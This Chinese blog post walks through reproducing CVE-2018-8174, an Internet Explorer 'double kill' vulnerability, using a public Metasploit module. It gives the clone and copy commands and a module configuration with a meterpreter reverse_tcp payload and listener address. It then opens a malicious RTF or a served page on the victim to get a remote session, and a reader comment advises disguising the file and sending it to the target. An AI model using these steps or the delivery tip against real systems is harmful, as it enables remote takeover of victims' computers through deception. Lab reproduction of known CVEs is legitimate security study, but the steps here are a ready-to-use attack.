双杀”0day漏洞(CVE-2018-8174)漏洞复现

博主： Admin
发布时间：2018 年 06 月 09 日
3582 次浏览
暂无评论
1250字数
分类：技术文章

0×01前言

该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招，最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞，并于5月8号发布了官方安全补丁，对该0day漏洞进行了修复，并将其命名为CVE-2018-8174。

0×02漏洞复现

在线下载 metasploit 模块到本地
git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

将CVE-2018-8174.rb复制到 fileformat 目录/
cd CVE-2018-8174-msf/
cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
将CVE-2018-8174.rtf复制到 exploits 目录
cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

启动 metasploit

use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.107.128
set lhost 192.168.107.128
exploit

1、进入 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开

cd /root/.msf4/local/

2、IE浏览器打开 http://192.168.107.128:8080 即可获得会话

最后修改：2021 年 03 月 09 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

暂无评论

chen
October 26th, 2018 at 12:10 am

该文档怎么在目标主机打开？？？

回复
1. 舜哥哥吖
  November 16th, 2018 at 10:47 am
  
  @chen
  
  @chen：伪装发送给对方。
  
  回复

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

双杀”0day漏洞(CVE-2018-8174)漏洞复现

Admin • 2018 年 06 月 09 日

<h1>0×01前言</h1><p>该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招，最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞，并于5月8号发布了官方安全补丁，对该0day漏洞进行了修复，并将其命名为CVE-2018-8174。</p><h1>0×02漏洞复现</h1><p>在线下载 metasploit 模块到本地<br>git clone <span class="external-link"><a class="no-external-link" href="https://github.com/0x09AL/CVE-2018-8174-msf.git" target="_blank"><i data-feather="external-link"></i><a href="https://github.com/0x09AL/CVE-2018-8174-msf.git">https://github.com/0x09AL/CVE-2018-8174-msf.git</a></span></a> <br><img src="https://shung.oss-cn-beijing.aliyuncs.com/blog/20210309144446.png" alt="" title="" style=""></p><p>将CVE-2018-8174.rb复制到 fileformat 目录/<br><code>cd CVE-2018-8174-msf/</code><br><code>cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/</code><br>将CVE-2018-8174.rtf复制到 exploits 目录<br><code>cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/</code><br><img src="https://shung.oss-cn-beijing.aliyuncs.com/blog/20210309144618.png" alt="" title="" style=""></p><p>启动 metasploit</p><pre><code>use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.107.128
set lhost 192.168.107.128
exploit</code></pre><p><img src="https://shung.oss-cn-beijing.aliyuncs.com/blog/20210309144652.png" alt="" title="" style=""><br>1、进入 /root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开</p><p><code>cd /root/.msf4/local/</code></p><p><img src="https://shung.oss-cn-beijing.aliyuncs.com/blog/20210309144703.png" alt="" title="" style=""><br><img src="https://shung.oss-cn-beijing.aliyuncs.com/blog/20210309144714.png" alt="" title="" style=""></p><p>2、IE浏览器打开 <code>http://192.168.107.128:8080</code> 即可获得会话</p>